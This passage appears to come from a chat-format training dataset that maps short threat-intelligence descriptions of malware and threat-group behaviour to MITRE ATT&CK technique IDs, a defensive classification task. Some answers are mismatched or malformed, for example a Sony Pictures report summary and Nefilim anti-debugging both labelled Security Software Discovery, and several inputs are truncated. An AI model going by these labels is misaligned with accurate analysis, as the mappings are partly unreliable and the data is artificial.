- "content": "T1204.002 - User Execution: Malicious File"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "KONNI has relied on a victim to enable malicious macros within an attachment delivered via email."
- },
- {
- "role": "assistant",
- "content": "T1204.002 - User Execution: Malicious File"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "RogueRobin base64 encodes strings that are sent to the C2 over its DNS tunnel."
- },
- {
- "role": "assistant",
- "content": "T1132.001 - Data Encoding: Standard Encoding"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A 2016 Novetta report detailed the work of security vendors attempting to unveil tools and infrastructure related to the 2014 destructive attack against Sony Pictures Entertainment"
- },
- {
- "role": "assistant",
- "content": "T1518.001 - Software Discovery: Security Software Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT38 has used several code packing methods such as Themida, Enigma, VMProtect, and Obsidium, to pack their implants."
- },
- {
- "role": "assistant",
- "content": "T1027.002 - Obfuscated Files or Information: Software Packing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "From these reports, we know that the group uses an abundance of tools and tactics, ranging across zero-day exploits targeting common applications such as Java or Microsoft Office, heavy use of spear-phishing attacks, compromising legitimate websites to stage watering-hole attacks, and targeting over a variety of operating systems – Windows, OSX, Linux, even mobile iOS"
- },
- {
- "role": "assistant",
- "content": "T1189 - Drive-by Compromise"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "is a kernel-mode rootkit."
- },
- {
- "role": "assistant",
- "content": "T1014 - Rootkit"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "actors obtain legitimate credentials using a variety of methods and use them to further lateral movement on victim networks."
- },
- {
- "role": "assistant",
- "content": "T1078 - Valid Accounts"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "KONNI can collect the IP address from the victim’s machine."
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The ultimate goal of both Type A and B loaders is to de-obfuscate and load a Cobalt Strike Reflective Loader in memory. At the conclusion of the de-obfuscation process, both variants proceed to load the Reflective Loader in memory, which subsequently executes Cobalt Strike Beacon in memory"
- },
- {
- "role": "assistant",
- "content": "T1027.002 - Obfuscated Files or Information: Software Packing', 'T1140 - Deobfuscate/Decode Files or Information', 'T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A JavaScript backdoor has used Google Apps Script as its C2 server."
- },
- {
- "role": "assistant",
- "content": "T1102 - Web Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "During Operation Dust Storm, attackers used VBS code to decode payloads."
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "TeamTNT has searched for attached VGA devices using lspci."
- },
- {
- "role": "assistant",
- "content": "T1120 - Peripheral Device Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SUNBURST used the WMI query \"Select * From Win32_SystemDriver\" to retrieve a driver listing."
- },
- {
- "role": "assistant",
- "content": "T1047 - Windows Management Instrumentation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has leveraged a zero-day vulnerability to escalate privileges."
- },
- {
- "role": "assistant",
- "content": "T1068 - Exploitation for Privilege Escalation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "P.A.S. Webshell can use predefined users and passwords to execute brute force attacks against SSH, FTP, POP3, MySQL, MSSQL, and PostgreSQL services."
- },
- {
- "role": "assistant",
- "content": "T1110.001 - Brute Force: Password Guessing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ZIRCONIUM has used malicious links and web beacons in e-mails for malware download and to track hits to attacker-controlled URL's."
- },
- {
- "role": "assistant",
- "content": "T1566.002 - Phishing: Spearphishing Link"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Ebury v1.4 has a fallback mechanism whereby a domain generation algorithm (DGA) is used when the attacker doesn’t connect to the infected system via the OpenSSH backdoor for three days. Under these conditions, Ebury will exfiltrate the collected data using the generated domain. Ebury v1.6 has the same mechanism, but there is a minor change to the DGA itself"
- },
- {
- "role": "assistant",
- "content": "T1568.002 - Domain Generation Algorithms', 'T1008 - Fallback Channels"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "uses a custom crypter leveraging Microsoft’s CryptoAPI to encrypt C2 traffic."
- },
- {
- "role": "assistant",
- "content": "T1573 - Encrypted Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "gh0st RAT can create a new service to establish persistence."
- },
- {
- "role": "assistant",
- "content": "T1543.003 - Create or Modify System Process: Windows Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SecretsDump and Mimikatz modules within Impacket can perform credential dumping to obtain account and password information from NTDS.dit."
- },
- {
- "role": "assistant",
- "content": "T1003.003 - OS Credential Dumping: NTDS"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PoetRAT has used spearphishing attachments to infect victims."
- },
- {
- "role": "assistant",
- "content": "T1204.002 - User Execution: Malicious File"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FIN6 used the Plink command-line utility to create SSH tunnels to C2 servers."
- },
- {
- "role": "assistant",
- "content": "T1572 - Protocol Tunneling', 'T1573.002 - Asymmetric Cryptography"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FIVEHANDS can receive a command line argument to limit file encryption to specified directories."
- },
- {
- "role": "assistant",
- "content": "T1059 - Command and Scripting Interpreter"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "In order to “steal” cryptocurrency from a victim, WeSteal uses regular expressions to look for strings matching the patterns of Bitcoin and Ethereum wallet identifiers being copied to the clipboard. When it matches these, it replaces the copied wallet ID in the clipboard with one supplied by the malware. The victim then pastes the substituted wallet ID for a transaction, and the funds are sent instead to the substitute wallet."
- },
- {
- "role": "assistant",
- "content": "T1115 - Clipboard Data"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "down_new has the ability to AES encrypt C2 communications."
- },
- {
- "role": "assistant",
- "content": "T1573.001 - Symmetric Cryptography"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "To evade protections, Egregor create a Group Policy Object to disable Windows Defender and try to takedown any anti-virus console prior to ransomware execution"
- },
- {
- "role": "assistant",
- "content": "T1562.001 - Impair Defenses: Disable or Modify Tools"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "GALLIUM used the Windows command shell to execute commands."
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "One persistence mechanism used by is to register itself as a Windows service."
- },
- {
- "role": "assistant",
- "content": "T1543.003 - Create or Modify System Process: Windows Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "RainyDay can use the Windows Command Shell for execution."
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "NETEAGLE can use HTTP to download resources that contain an IP address and port number pair to connect to for C2."
- },
- {
- "role": "assistant",
- "content": "T1568 - Dynamic Resolution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The Nefilim ransomware uses IsDebuggerPresent, CheckRemoteDebuggerPresent, and NtQueryInformationProcess API functions to check if a user-mode debugger is running. Debuggers are used by security analysts to inspect malware’s behavior at the run-time. In the presence of a debugger, malware samples exhibited less malicious behavior. Moreover, Nefilim uses the NtSetInformationThread API function to evade debugging."
- },
- {
- "role": "assistant",
- "content": "T1518.001 - Software Discovery: Security Software Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Obviously, the request sent to the C&C is encoded with Base64. The bot subsequently receives its unique ID and uses it for identification at the start of the packet"
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "AADInternals can enumerate Azure AD groups."
- },
- {
- "role": "assistant",
- "content": "T1069.003 - Cloud Groups"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Variants of Emissary have added Run Registry keys to establish persistence."
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Carbanak also performs brute force tactics or takes advantage of credentials that are saved in web browsers."
- },
- {
- "role": "assistant",
- "content": "T1110 - Brute Force"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "JPIN can lower security settings by changing Registry keys."
- },
- {
- "role": "assistant",
- "content": "T1562.001 - Impair Defenses: Disable or Modify Tools"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Remsec can dump the SAM database."
- },
- {
- "role": "assistant",
- "content": "T1003.002 - OS Credential Dumping: Security Account Manager"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "HEXANE has used cloud services, including OneDrive, for C2."
- },
- {
- "role": "assistant",
- "content": "T1102.002 - Bidirectional Communication"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "(Source: SecureWorks) The “Windows Folder.exe” executable spawns and injects code into the legitimate notepad.exe Windows process (see Figure 2)"
- },
- {
- "role": "assistant",
- "content": "T1055.012 - Process Injection: Process Hollowing', 'T1055 - Process Injection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BOOSTWRITE has encoded its payloads using a ChaCha stream cipher with a 256-bit key and 64-bit Initialization vector (IV) to evade detection."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PUNCHBUGGY can delete files written to disk."
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Please note that the Ecipekac Layer III loader module is embedded in the encrypted Layer II loader"
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "HAMMERTOSS has used \"-WindowStyle hidden\" to conceal PowerShell windows."
- },
- {
- "role": "assistant",
- "content": "T1564.003 - Hide Artifacts: Hidden Window"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Based on the use of the relatively unique PLAINTEE malware, the malware’s use of the same file paths on in each cluster, and the similar targeting, we have grouped these attacks together under the RANCOR campaign moniker. Interestingly, the delivery document borrowed a technique which was publicized in late 2017 as being used by the Sofacy threat actors, embedding the main malicious code in a EXIF metadata property of the document. By doing so, the main content of the macro itself (Figure 2) can be kept relatively simple, and the malicious’ codes small footprint can help enable evasion of automated detection mechanisms based on macro content"
- },
- {
- "role": "assistant",
- "content": "T1204.002 - User Execution: Malicious File"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "With this approach, the luring message shown in the Figure 2 now serves another purpose. Not only does it lure the victim into enabling the macros, but it also is assigned an alternate text: “fkwarning”, as seen in Figure 5. The macro has code to check this attribute to make sure the luring message shape object is present. If this object is not found, the macro will exit without downloading additional payloads"
- },
- {
- "role": "assistant",
- "content": "T1497 - Virtualization/Sandbox Evasion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Ryuk attempts to encrypt all mounted drives and hosts that have Address Resolution Protocol (ARP) entries (IP addresses) and it enumerates all mounted drives by calling GetLogicalDrives. For each mounted drive, Ryuk calls GetDriveTypeW to determine the drive’s type. If the drive type is not a CD-ROM, files on the drive are encrypted. To retrieve IP addresses that have ARP entries, Ryuk calls GetIpNetTable. It iterates through all entries and then tries to enumerate files and folders on the remote host and encrypt the files"
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery', 'T1082 - System Information Discovery', 'T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can enumerate processes."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Clambling can identify the username on a compromised host."
- },
- {
- "role": "assistant",
- "content": "T1033 - System Owner/User Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Squirrelwaffle has gathered victim computer information and configurations."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT29 has used compromised identities to access networks via SSH, VPNs, and other remote access tools."
- },
- {
- "role": "assistant",
- "content": "T1133 - External Remote Services"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "GALLIUM used \"whoami\" and \"query user\" to obtain information about the victim user."
- },
- {
- "role": "assistant",
- "content": "T1033 - System Owner/User Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The C2 server can also send a PowerShell command to capture and store a screenshot of a victim’s system. POWRUNER will send the captured screenshot image file to the C2 server if the “fileupload” command is issued. Figure 6 shows the PowerShell “Get-Screenshot” function sent by the C2 server"
- },
- {
- "role": "assistant",
- "content": "T1113 - Screen Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has a tool that can enumerate current network connections."
- },
- {
- "role": "assistant",
- "content": "T1049 - System Network Connections Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Chimera has used PowerShell scripts to execute malicious payloads and the DSInternals PowerShell module to make use of Active Directory features."
- },
- {
- "role": "assistant",
- "content": "T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "During C0011, Transparent Tribe relied on a student target to open a malicious document delivered via email."
- },
- {
- "role": "assistant",
- "content": "T1204.002 - User Execution: Malicious File"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "uses a modified version of pentesting script wmiexec.vbs, which logs into a remote machine using WMI."
- },
- {
- "role": "assistant",
- "content": "T1047 - Windows Management Instrumentation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Lazarus Group has used \"mshta.exe\" to execute HTML pages downloaded by initial access documents."
- },
- {
- "role": "assistant",
- "content": "T1218.005 - Signed Binary Proxy Execution: Mshta"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Dragonfly 2.0 collected data from local victim systems."
- },
- {
- "role": "assistant",
- "content": "T1005 - Data from Local System"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A tool can spawn svchost.exe and inject the payload into that process."
- },
- {
- "role": "assistant",
- "content": "T1055 - Process Injection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A while loop is used to join a series of data blobs into the allocated buffer, and the contents of this buffer are then decrypted with an XOR based algorithm. Once decrypted, the crypter jumps into the data blob which turns out to be a shellcode responsible for decrypting the actual payload. The shellcode copies the encrypted payload into another buffer allocated by calling the VirtualAlloc API, and then decrypts this with an XOR based algorithm in a similar way to that described above. To execute the payload, the shellcode replaces the crypter’s code in memory with the code of the payload just decrypted, and jumps to its entry point"
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ShimRatReporter had the ability to download additional payloads."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SoreFang can enumerate domain accounts via \"net.exe user /domain\"."
- },
- {
- "role": "assistant",
- "content": "T1087.002 - Account Discovery: Domain Account"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Proxysvc executes a binary on the system and logs the results into a temp file by using: \"cmd.exe /c \" > %temp%\\PM* .tmp 2>&1\"\"."
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BitPaymer can enumerate the sessions for each user logged onto the infected host."
- },
- {
- "role": "assistant",
- "content": "T1087.001 - Account Discovery: Local Account"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "S-Type primarily uses port 80 for C2, but falls back to ports 443 or 8080 if initial communication fails."
- },
- {
- "role": "assistant",
- "content": "T1008 - Fallback Channels"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Remote Shell: The function above is seen throughout many of the binaries in the Mirage family and is executed when a command is sent from the C&C"
- },
- {
- "role": "assistant",
- "content": "T1059 - Command and Scripting Interpreter"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Flagpro has been used to execute the \"net localgroup administrators\" command on a targeted system."
- },
- {
- "role": "assistant",
- "content": "T1069.001 - Permission Groups Discovery: Local Groups"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Denis can launch a remote shell to execute arbitrary commands on the victim’s machine."
- },
- {
- "role": "assistant",
- "content": "T1059 - Command and Scripting Interpreter', 'T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Anchor can support windows execution via SMB shares."
- },
- {
- "role": "assistant",
- "content": "T1021.002 - Remote Services: SMB/Windows Admin Shares"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can add a new service to ensure persists on the system when delivered as another payload onto the system."
- },
- {
- "role": "assistant",
- "content": "T1543.003 - Create or Modify System Process: Windows Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "contains screen capture functionality."
- },
- {
- "role": "assistant",
- "content": "T1113 - Screen Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "LAPSUS$ has searched a victim's network for organization collaboration channels like MS Teams or Slack to discover further high-privilege account credentials."
- },
- {
- "role": "assistant",
- "content": "T1213 - Data from Information Repositories"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Gorgon Group sent emails to victims with malicious Microsoft Office documents attached."
- },
- {
- "role": "assistant",
- "content": "T1566.001 - Phishing: Spearphishing Attachment"
- }
- ]
- },
- {
- "messages": [
